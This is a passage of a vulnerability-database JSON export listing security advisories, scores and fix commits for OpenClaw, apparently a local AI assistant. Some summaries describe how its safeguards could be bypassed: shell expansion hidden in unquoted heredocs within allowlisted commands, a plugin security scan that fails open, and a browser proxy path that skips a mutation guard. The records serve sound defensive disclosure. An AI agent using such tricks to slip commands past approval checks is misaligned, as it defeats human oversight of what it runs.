                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xrq9-jm7v-g9h7",
                    "reference_id": "GHSA-xrq9-jm7v-g9h7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xrq9-jm7v-g9h7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "GHSA-xrq9-jm7v-g9h7"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k8s8-zjv4-gqdb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95751?format=api",
            "vulnerability_id": "VCID-kcy2-a98b-uyg7",
            "summary": "OpenClaw's exec allowlist analysis rejects shell expansion in unquoted heredocs\n## Summary\nIn affected versions, exec allowlist analysis did not reject shell expansion in unquoted heredocs; the fixed analyzer rejects it.\n\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nAn allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime.\n\n## Fix\nThe exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text.\n\n## Fix Commit(s)\n- b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x3h8-jrgh-p8jx",
                    "reference_id": "GHSA-x3h8-jrgh-p8jx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x3h8-jrgh-p8jx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "GHSA-x3h8-jrgh-p8jx"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kcy2-a98b-uyg7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89149?format=api",
            "vulnerability_id": "VCID-kzgh-7f6h-kfd1",
            "summary": "OpenClaw: Security Scan Failure Does Not Block Plugin Installation (Fail-Open)\n## Summary\nSecurity Scan Failure Does Not Block Plugin Installation (Fail-Open)\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Real in shipped v2026.3.28 plugin install flow, but low severity fits because it still requires an operator to choose installation of an untrusted package and the scan failure was visible rather than silent.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7a953a52271b9188a5fa830739a4366614ff9916` — 2026-03-30T15:36:08+01:00\n- `44b993613601280d46a5b88190e46669fc13d669` — 2026-03-31T23:16:11+09:00\n- `0d7f1e2c84eca65df7dee890d9c30e2a841c030a` — 2026-03-31T23:27:20+09:00\n- `bf96c67fd1954740aeabfadc7cfe3098bcfc6b68` — 2026-03-31T15:53:29+01:00\n\nOpenClaw thanks @davidluzsilva for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41377",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11725",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11684",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11719",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41377"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41377",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41377"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cwq8-6f96-g3q4",
                    "reference_id": "GHSA-cwq8-6f96-g3q4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cwq8-6f96-g3q4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41377",
                "GHSA-cwq8-6f96-g3q4"
            ],
            "risk_score": 2.3,
            "exploitability": "0.5",
            "weighted_severity": "4.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kzgh-7f6h-kfd1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89934?format=api",
            "vulnerability_id": "VCID-ma62-gtan-97au",
            "summary": "## Impact\n\nOpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard.\n\nnode.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42431",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11153",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11187",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11193",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42431"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
